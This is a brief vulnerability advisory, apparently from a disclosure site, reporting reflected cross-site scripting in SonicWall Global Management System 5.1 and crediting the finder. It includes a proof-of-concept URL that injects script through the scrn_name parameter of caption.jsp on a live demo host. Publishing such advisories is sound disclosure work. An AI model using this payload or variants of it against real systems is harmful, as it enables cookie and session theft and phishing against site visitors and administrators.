|
|
| |
| An attacker can steal visitor and administor cookies or session id using XSS and accomplish successful phishing attacks with the real website address. |
| |
Credit:
The information has been provided by Nir Goldshlager.
|
| |
Vulnerable Systems:
* SonicWall Global Management System version 5.1
Poc: https://gms.demo.sonicwall.com/sgms/caption.jsp?scrn_name=%22%3E%3Cscript%3Ealert%28%27g%27%29%3C/script%3E%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E%3C&help_url=dd
|
|
blog comments powered by
|